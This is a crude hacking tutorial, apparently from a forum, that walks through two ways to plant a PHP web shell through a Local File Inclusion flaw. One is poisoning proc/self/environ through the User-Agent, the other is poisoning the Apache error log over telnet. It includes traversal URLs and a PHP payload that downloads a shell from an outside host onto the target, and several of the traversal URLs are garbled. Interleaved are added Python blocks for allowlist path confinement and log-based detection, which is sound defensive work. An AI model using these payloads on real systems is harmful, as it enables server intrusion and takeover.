Today I am going to teach you two ways of uploading a shell via an LFI vulnerability.
Requirement:- a website vulnerable to LFI.
Method 1:-
NOTE: You will need Firefox and its add-on Tamper Data to do this method!
LFI, or Local File Inclusion, allows you to include a local file (that is, a file stored on the server) and run it in a web script.
In this method we are going to upload a shell by accessing proc/self/environ.
Now we have our page:-
http://www.target.com/index.php?include=register.php
And now we are going to do this:-
http://www.target.com/index.php?include=../
If it gives you an error message, this is good. The best thing that can happen is that it says "No such file or directory".
But anyway, now add this to your URL:-
http://www.target.com/index.php?include=../etc/passwd
And as long as there is no text other than an error message on the page, keep adding "../" to the URL, so it would be like:
http://www.target.com/index.php?include=.../passwd
http://www.target.com/index.php?include=.../passwd
http://www.target.com/index.php?include=.../passwd
And so on. Now let's say we got to this URL:-
http://www.target.com/index.php?include=.../passwd
And we see some huge shitty text we cannot handle. Now change the etc/passwd in the URL to proc/self/environ so it would look like this:
http://www.target.com/index.php?include=...environ
If you see some text, you did good; if you see an error message, you did bad. Now this is the point where we use Tamper Data. Start your Tamper Data and reload the page, and for the user agent you type in the following PHP script:-
PHP Code:-
<?php $file = fopen("shell.php", "w+"); $stream = fopen("http://www.website.com/yourshell.txt", "r"); while (!feof($stream)) { $shell .= fgets($stream); } fwrite($file, $shell); fclose($file); ?>
This will execute the PHP script on the site and create a shell.php on the server. Why? Because the user agent is part of the proc/self/environ content being displayed on the webpage, and since the page includes that content as PHP, a web script placed in it gets executed.
Now simply access your shell by going to
http://www.target.com/shell.php
And rape the server.
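From the defender's side, the traversal steps above stop working once the include parameter is looked up in an allowlist and the resolved path is confined to the pages directory. The following is an added example, not part of the original post, modelling that check in Python; ALLOWED_PAGES, the function names and the temporary directory layout are assumptions.

```python
import os
import tempfile

# Hypothetical allowlist: value accepted in ?include= -> file name under the pages directory.
ALLOWED_PAGES = {"register.php": "register.php", "login.php": "login.php"}


def naive_resolve(base_dir, requested):
    """Model of the vulnerable page: the parameter is joined to the base directory unchecked."""
    return os.path.normpath(os.path.join(base_dir, requested))


def confined_path(base_dir, relative):
    """Canonicalise (resolving ../ and symlinks) and refuse anything outside base_dir."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, relative))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def resolve_include(base_dir, requested):
    """Allowlist first, confinement second; returns a path to include or None."""
    name = ALLOWED_PAGES.get(requested)
    if name is None:
        return None  # unknown page names never reach the filesystem
    path = confined_path(base_dir, name)
    return path if path and os.path.isfile(path) else None


def demo():
    """Run the page's parameter values against a constructed pages directory."""
    with tempfile.TemporaryDirectory() as pages:
        open(os.path.join(pages, "register.php"), "w").close()
        os.symlink("/etc", os.path.join(pages, "cfg"))  # constructed symlink escape
        return {
            "naive": naive_resolve("/var/www/pages", "../../../etc/passwd"),
            "ok": resolve_include(pages, "register.php") is not None,
            "traversal": resolve_include(pages, "../etc/passwd"),
            "environ": confined_path(pages, "../../../../proc/self/environ"),
            "symlink": confined_path(pages, "cfg/passwd"),
        }


if __name__ == "__main__":
    print(demo())
```

The same two checks apply in the PHP page itself: map the parameter to a fixed set of files, and compare the canonical path against the canonical base directory before including anything.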
Now LFI method 2:-
NOTE: This only works on Apache servers!
Alright, you get back to the point where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd; you will try to get access to apache/logs/error.log
If you have a brain, you should know how to do that, since it's EXACTLY the same method as on etc/passwd (explained in LFI method 1).
Now when you have found the file, open up cmd and type in
Code:
telnet www.target.com 80
When you are inside the telnet, you copy the following code (you use your own shell URL):
PHP Code:
<?php $file = fopen("shell.php", "w+"); $stream = fopen("http://www.website.com/yourshell.txt", "r"); while (!feof($stream)) { $shell .= fgets($stream); } fwrite($file, $shell); fclose($file); ?>
Paste it into the telnet window, and press enter once or maybe twice (until you get an error message).
Now refresh the page in the browser (error.log) once and there you go.
The PHP script will be executed and your shell will get uploaded to the server.
Access it by typing in the following into your browser:-
http://www.target.com/shell.php
ENJOY...
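Both methods leave the same traces in a web server's access log: traversal sequences aimed at proc/self/environ or a log file, and a PHP open tag in the User-Agent or in a malformed request line. This added example (not from the original post) flags them in Apache combined-format lines; the sample lines, addresses and function names are constructed.

```python
import re
from urllib.parse import unquote

# Apache "combined" format. The User-Agent is matched greedily because Apache
# logs embedded quotes as \" and the field may contain quote characters.
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>.*?)" (?P<status>\d{3}) \S+ '
                  r'"(?P<ref>[^"]*)" "(?P<ua>.*)"$')
TRAVERSAL = re.compile(r'\.\.[/\\]')
TARGETS = re.compile(r'proc/self/environ|etc/passwd|(error|access)[._]log', re.I)
PHP_TAG = re.compile(r'<\?(php|=)', re.I)

# Constructed sample lines (documentation address ranges, placeholder payloads).
SAMPLE = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?include=register.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?include=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:57:12 +0000] "GET /index.php?include=../../proc/self/environ HTTP/1.1" 200 912 "-" "<?php /* constructed placeholder */ ?>"',
    '203.0.113.9 - - [10/Oct/2023:13:58:40 +0000] "<?php /* constructed placeholder */ ?>" 400 226 "-" "-"',
]


def decode(value, rounds=3):
    """URL-decode repeatedly so single- and double-encoded ../ both normalise."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def classify(line):
    """Return (client_ip, findings) for one access-log line."""
    m = LINE.match(line)
    if not m:
        return None, ["unparsed"]
    req, ua = decode(m["req"]), m["ua"]
    checks = [("traversal", TRAVERSAL.search(req)),
              ("sensitive-target", TARGETS.search(req)),
              ("php-in-user-agent", PHP_TAG.search(ua)),
              ("php-in-request-line", PHP_TAG.search(req))]
    return m["ip"], [name for name, hit in checks if hit]


def poisoning_suspects(lines):
    """Clients that both planted a PHP tag and requested a sensitive include target."""
    injected, included = set(), set()
    for ip, findings in map(classify, lines):
        if any(f.startswith("php-in-") for f in findings):
            injected.add(ip)
        if "sensitive-target" in findings:
            included.add(ip)
    return sorted(injected & included)
```

A 200 response to a request flagged "sensitive-target" is the line to escalate first, since it means the include succeeded.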